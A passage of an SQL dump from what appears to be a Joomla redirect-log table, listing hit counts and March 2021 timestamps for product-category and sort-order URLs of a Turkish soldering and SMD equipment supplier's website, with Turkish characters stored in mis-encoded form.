00:00:00',301),(26578,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2021-03-17 05:09:05','0000-00-00 00:00:00',301),(26579,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,category_name',NULL,'','',590,0,'2021-03-17 05:10:05','0000-00-00 00:00:00',301),(26580,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',590,0,'2021-03-17 05:10:49','0000-00-00 00:00:00',301),(26581,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,mf_name',NULL,'','',588,0,'2021-03-17 05:13:21','0000-00-00 00:00:00',301),(26582,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',585,0,'2021-03-17 05:14:14','0000-00-00 00:00:00',301),(26583,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,ordering?language=en-gb',NULL,'','',1,0,'2021-03-17 05:17:10','0000-00-00 00:00:00',301),(26584,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,product_name',NULL,'','',577,0,'2021-03-17 05:18:01','0000-00-00 00:00:00',301),(26585,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',591,0,'2021-03-17 05:18:47','0000-00-00 00:00:00',301),(26586,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,product_sku',NULL,'','',579,0,'2021-03-17 05:21:35','0000-00-00 00:00:00',301),(26587,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/cm-602-l-detail',NULL,'','',304,0,'2021-03-17 05:23:30','0000-00-00 00:00:00',301),(26588,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',300,0,'2021-03-17 05:24:38','0000-00-00 00:00:00',301),(26589,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/dirdesc',NULL,'','',602,0,'2021-03-17 05:25:19','0000-00-00 00:00:00',301),(26590,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/mx200lp-3-detail',NULL,'','',299,0,'2021-03-17 05:27:17','0000-00-00 00:00:00',301),(26591,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',300,0,'2021-03-17 05:27:51','0000-00-00 00:00:00',301),(26592,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/npm-detail',NULL,'','',293,0,'2021-03-17 05:28:48','0000-00-00 00:00:00',301),(26593,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/npm-detail/askquestion?tmpl=component',NULL,'','',290,0,'2021-03-17 05:29:59','0000-00-00 00:00:00',301),(26594,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z?language=en-gb',NULL,'','',1,0,'2021-03-17 05:31:19','0000-00-00 00:00:00',301),(26595,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim',NULL,'','',563,0,'2021-03-17 05:32:23','0000-00-00 00:00:00',301),(26596,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,`p`.product_sku',NULL,'','',589,0,'2021-03-17 05:33:28','0000-00-00 00:00:00',301),(26597,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',570,0,'2021-03-17 05:34:27','0000-00-00 00:00:00',301),(26598,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2021-03-17 05:37:29','0000-00-00 00:00:00',301),(26599,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,category_name?language=tr-tr',NULL,'','',1,0,'2021-03-17 05:38:29','0000-00-00 00:00:00',301),(26600,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,mf_name',NULL,'','',583,0,'2021-03-17 05:39:16','0000-00-00 00:00:00',301),(26601,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',582,0,'2021-03-17 05:40:25','0000-00-00 00:00:00',301),(26602,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,ordering',NULL,'','',575,0,'2021-03-17 05:43:19','0000-00-00 00:00:00',301),(26603,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,product_name',NULL,'','',582,0,'2021-03-17 05:44:30','0000-00-00 00:00:00',301),(26604,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',589,0,'2021-03-17 05:45:39','0000-00-00 00:00:00',301),(26605,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,product_sku',NULL,'','',599,0,'2021-03-17 05:48:56','0000-00-00 00:00:00',301),(26606,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/dirdesc',NULL,'','',591,0,'2021-03-17 05:51:11','0000-00-00 00:00:00',301),(26607,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/ess-310-24-detail',NULL,'','',299,0,'2021-03-17 05:52:15','0000-00-00 00:00:00',301),(26608,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-26-detail',NULL,'','',285,0,'2021-03-17 05:53:03','0000-00-00 00:00:00',301),(26609,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',282,0,'2021-03-17 05:54:00','0000-00-00 00:00:00',301),(26610,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-detail',NULL,'','',278,0,'2021-03-17 05:54:54','0000-00-00 00:00:00',301),(26611,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',281,0,'2021-03-17 05:55:53','0000-00-00 00:00:00',301),(26612,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim?language=tr-tr',NULL,'','',1,0,'2021-03-17 05:57:01','0000-00-00 00:00:00',301),(26613,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n',NULL,'','',582,0,'2021-03-17 05:57:46','0000-00-00 00:00:00',301),(26614,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',566,0,'2021-03-17 05:59:01','0000-00-00 00:00:00',301),(26615,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',560,0,'2021-03-17 05:59:52','0000-00-00 00:00:00',301),(26616,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name',NULL,'','',568,0,'2021-03-17 06:02:46','0000-00-00 00:00:00',301),(26617,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',579,0,'2021-03-17 06:03:52','0000-00-00 00:00:00',301),(26618,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',591,0,'2021-03-17 06:07:27','0000-00-00 00:00:00',301),(26619,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name?language=tr-tr',NULL,'','',2,0,'2021-03-17 06:09:49','0000-00-00 00:00:00',301),(26620,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_sku',NULL,'','',602,0,'2021-03-17 06:11:09','0000-00-00 00:00:00',301),(26621,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fä±rä±n/dirdesc',NULL,'','',582,0,'2021-03-17 06:14:14','0000-00-00 00:00:00',301),(26622,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±',NULL,'','',585,0,'2021-03-17 06:17:26','0000-00-00 00:00:00',301),(26623,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',588,0,'2021-03-17 06:18:38','0000-00-00 00:00:00',301),(26624,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',581,0,'2021-03-17 06:19:36','0000-00-00 00:00:00',301),(26625,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,category_name',NULL,'','',582,0,'2021-03-17 06:22:55','0000-00-00 00:00:00',301),(26626,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',599,0,'2021-03-17 06:23:49','0000-00-00 00:00:00',301),(26627,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-17 06:27:01','0000-00-00 00:00:00',301),(26628,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2021-03-17 06:28:05','0000-00-00 00:00:00',301),(26629,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,mf_name',NULL,'','',575,0,'2021-03-17 06:29:08','0000-00-00 00:00:00',301),(26630,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2021-03-17 06:30:14','0000-00-00 00:00:00',301),(26631,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,category_name',NULL,'','',603,0,'2021-03-17 06:31:21','0000-00-00 00:00:00',301),(26632,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',616,0,'2021-03-17 06:32:43','0000-00-00 00:00:00',301),(26633,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_sku',NULL,'','',626,0,'2021-03-17 06:47:05','0000-00-00 00:00:00',301),(26634,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/dirdesc',NULL,'','',613,0,'2021-03-17 06:49:05','0000-00-00 00:00:00',301),(26635,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±?language=tr-tr',NULL,'','',2,0,'2021-03-17 06:51:00','0000-00-00 00:00:00',301),(26636,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z',NULL,'','',620,0,'2021-03-17 06:52:08','0000-00-00 00:00:00',301),(26637,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',609,0,'2021-03-17 06:53:36','0000-00-00 00:00:00',301),(26638,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',607,0,'2021-03-17 06:54:55','0000-00-00 00:00:00',301),(26639,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,category_name',NULL,'','',589,0,'2021-03-17 06:58:32','0000-00-00 00:00:00',301),(26640,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',598,0,'2021-03-17 06:59:28','0000-00-00 00:00:00',301),(26641,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,mf_name',NULL,'','',588,0,'2021-03-17 07:02:56','0000-00-00 00:00:00',301),(26642,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',594,0,'2021-03-17 07:03:56','0000-00-00 00:00:00',301),(26643,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,ordering',NULL,'','',600,0,'2021-03-17 07:06:56','0000-00-00 00:00:00',301),(26644,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,product_name',NULL,'','',615,0,'2021-03-17 07:09:06','0000-00-00 00:00:00',301),(26645,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',614,0,'2021-03-17 07:10:10','0000-00-00 00:00:00',301),(26646,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/by,product_sku',NULL,'','',610,0,'2021-03-17 07:13:30','0000-00-00 00:00:00',301),(26647,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hä±z/dirdesc',NULL,'','',617,0,'2021-03-17 07:15:45','0000-00-00 00:00:00',301),(26648,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n',NULL,'','',629,0,'2021-03-17 07:19:05','0000-00-00 00:00:00',301),(26649,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',629,0,'2021-03-17 07:19:44','0000-00-00 00:00:00',301),(26650,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',646,0,'2021-03-17 07:20:25','0000-00-00 00:00:00',301),(26651,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,category_name',NULL,'','',643,0,'2021-03-17 07:23:26','0000-00-00 00:00:00',301),(26652,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',645,0,'2021-03-17 07:24:24','0000-00-00 00:00:00',301),(26653,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,mf_name',NULL,'','',638,0,'2021-03-17 07:27:25','0000-00-00 00:00:00',301),(26654,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',639,0,'2021-03-17 07:28:35','0000-00-00 00:00:00',301),(26655,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,ordering',NULL,'','',614,0,'2021-03-17 07:31:44','0000-00-00 00:00:00',301),(26656,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,mf_name',NULL,'','',592,0,'2021-03-17 07:33:22','0000-00-00 00:00:00',301),(26657,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',612,0,'2021-03-17 07:33:35','0000-00-00 00:00:00',301),(26658,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,product_name',NULL,'','',620,0,'2021-03-17 07:33:44','0000-00-00 00:00:00',301),(26659,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,ordering',NULL,'','',598,0,'2021-03-17 07:34:00','0000-00-00 00:00:00',301),(26660,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,product_name',NULL,'','',601,0,'2021-03-17 07:34:19','0000-00-00 00:00:00',301),(26661,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',600,0,'2021-03-17 07:34:29','0000-00-00 00:00:00',301),(26662,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',624,0,'2021-03-17 07:34:35','0000-00-00 00:00:00',301),(26663,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,product_sku',NULL,'','',579,0,'2021-03-17 07:34:52','0000-00-00 00:00:00',301),(26664,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/dirdesc',NULL,'','',592,0,'2021-03-17 07:35:02','0000-00-00 00:00:00',301),(26665,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/ess-310-24-detail',NULL,'','',300,0,'2021-03-17 07:35:10','0000-00-00 00:00:00',301),(26666,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',297,0,'2021-03-17 07:35:14','0000-00-00 00:00:00',301),(26667,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/ess-310-detail',NULL,'','',301,0,'2021-03-17 07:35:19','0000-00-00 00:00:00',301),(26668,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',301,0,'2021-03-17 07:35:23','0000-00-00 00:00:00',301),(26669,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',570,0,'2021-03-17 07:35:32','0000-00-00 00:00:00',301),(26670,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,`p`.product_sku',NULL,'','',595,0,'2021-03-17 07:35:37','0000-00-00 00:00:00',301),(26671,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',588,0,'2021-03-17 07:35:42','0000-00-00 00:00:00',301),(26672,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name',NULL,'','',592,0,'2021-03-17 07:35:59','0000-00-00 00:00:00',301),(26673,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name/dirdesc',NULL,'','',585,0,'2021-03-17 07:36:04','0000-00-00 00:00:00',301),(26674,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2021-03-17 07:36:13','0000-00-00 00:00:00',301),(26675,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/dirdesc',NULL,'','',556,0,'2021-03-17 07:36:18','0000-00-00 00:00:00',301),(26676,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-26-detail',NULL,'','',282,0,'2021-03-17 07:36:25','0000-00-00 00:00:00',301),(26677,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',275,0,'2021-03-17 07:36:30','0000-00-00 00:00:00',301),(26678,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-detail',NULL,'','',275,0,'2021-03-17 07:36:34','0000-00-00 00:00:00',301),(26679,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',271,0,'2021-03-17 07:36:39','0000-00-00 00:00:00',301),(26680,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n',NULL,'','',554,0,'2021-03-17 07:36:47','0000-00-00 00:00:00',301),(26681,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',550,0,'2021-03-17 07:36:50','0000-00-00 00:00:00',301),(26682,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',554,0,'2021-03-17 07:36:55','0000-00-00 00:00:00',301),(26683,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name',NULL,'','',575,0,'2021-03-17 07:37:08','0000-00-00 00:00:00',301),(26684,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',572,0,'2021-03-17 07:37:12','0000-00-00 00:00:00',301),(26685,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/by,product_sku',NULL,'','',628,0,'2021-03-17 07:37:49','0000-00-00 00:00:00',301),(26686,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',560,0,'2021-03-17 07:39:39','0000-00-00 00:00:00',301),(26687,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,product_sku',NULL,'','',578,0,'2021-03-17 07:40:01','0000-00-00 00:00:00',301),(26688,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/dirdesc',NULL,'','',570,0,'2021-03-17 07:40:15','0000-00-00 00:00:00',301),(26689,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z',NULL,'','',571,0,'2021-03-17 07:40:34','0000-00-00 00:00:00',301),(26690,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',562,0,'2021-03-17 07:40:41','0000-00-00 00:00:00',301),(26691,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',560,0,'2021-03-17 07:40:49','0000-00-00 00:00:00',301),(26692,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,category_name',NULL,'','',564,0,'2021-03-17 07:41:21','0000-00-00 00:00:00',301),(26693,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',566,0,'2021-03-17 07:41:32','0000-00-00 00:00:00',301),(26694,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,mf_name',NULL,'','',568,0,'2021-03-17 07:42:07','0000-00-00 00:00:00',301),(26695,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',572,0,'2021-03-17 07:42:16','0000-00-00 00:00:00',301),(26696,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,ordering',NULL,'','',569,0,'2021-03-17 07:42:41','0000-00-00 00:00:00',301),(26697,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,product_name',NULL,'','',582,0,'2021-03-17 07:42:58','0000-00-00 00:00:00',301),(26698,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',581,0,'2021-03-17 07:43:06','0000-00-00 00:00:00',301),(26699,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/by,product_sku',NULL,'','',599,0,'2021-03-17 07:43:32','0000-00-00 00:00:00',301),(26700,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hä±z/dirdesc',NULL,'','',596,0,'2021-03-17 07:43:45','0000-00-00 00:00:00',301),(26701,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±',NULL,'','',584,0,'2021-03-17 07:44:09','0000-00-00 00:00:00',301),(26702,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',575,0,'2021-03-17 07:44:16','0000-00-00 00:00:00',301),(26703,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',573,0,'2021-03-17 07:44:29','0000-00-00 00:00:00',301),(26704,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,category_name',NULL,'','',580,0,'2021-03-17 07:44:58','0000-00-00 00:00:00',301),(26705,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',575,0,'2021-03-17 07:45:07','0000-00-00 00:00:00',301),(26706,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,mf_name',NULL,'','',583,0,'2021-03-17 07:45:36','0000-00-00 00:00:00',301),(26707,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',583,0,'2021-03-17 07:45:43','0000-00-00 00:00:00',301),(26708,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,ordering',NULL,'','',585,0,'2021-03-17 07:45:58','0000-00-00 00:00:00',301),(26709,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_name',NULL,'','',585,0,'2021-03-17 07:46:15','0000-00-00 00:00:00',301),(26710,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',574,0,'2021-03-17 07:46:22','0000-00-00 00:00:00',301),(26711,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n/dirdesc',NULL,'','',621,0,'2021-03-17 07:46:25','0000-00-00 00:00:00',301),(26712,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_sku',NULL,'','',590,0,'2021-03-17 07:46:43','0000-00-00 00:00:00',301),(26713,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hä±zlä±/dirdesc',NULL,'','',587,0,'2021-03-17 07:46:55','0000-00-00 00:00:00',301),(26714,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z',NULL,'','',605,0,'2021-03-17 07:47:13','0000-00-00 00:00:00',301),(26715,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',629,0,'2021-03-17 07:47:16','0000-00-00 00:00:00',301),(26716,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',622,0,'2021-03-17 07:47:20','0000-00-00 00:00:00',301),(26717,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,category_name',NULL,'','',623,0,'2021-03-17 07:47:34','0000-00-00 00:00:00',301),(26718,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',620,0,'2021-03-17 07:47:38','0000-00-00 00:00:00',301),(26719,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,mf_name',NULL,'','',611,0,'2021-03-17 07:47:50','0000-00-00 00:00:00',301),(26720,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',611,0,'2021-03-17 07:47:54','0000-00-00 00:00:00',301),(26721,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,ordering',NULL,'','',615,0,'2021-03-17 07:48:06','0000-00-00 00:00:00',301),(26722,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,product_name',NULL,'','',603,0,'2021-03-17 07:48:13','0000-00-00 00:00:00',301),(26723,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',615,0,'2021-03-17 07:48:16','0000-00-00 00:00:00',301),(26724,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,product_sku',NULL,'','',607,0,'2021-03-17 07:48:28','0000-00-00 00:00:00',301),(26725,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hä±z/dirdesc',NULL,'','',611,0,'2021-03-17 07:48:35','0000-00-00 00:00:00',301),(26726,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n',NULL,'','',609,0,'2021-03-17 07:48:45','0000-00-00 00:00:00',301),(26727,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',613,0,'2021-03-17 07:48:49','0000-00-00 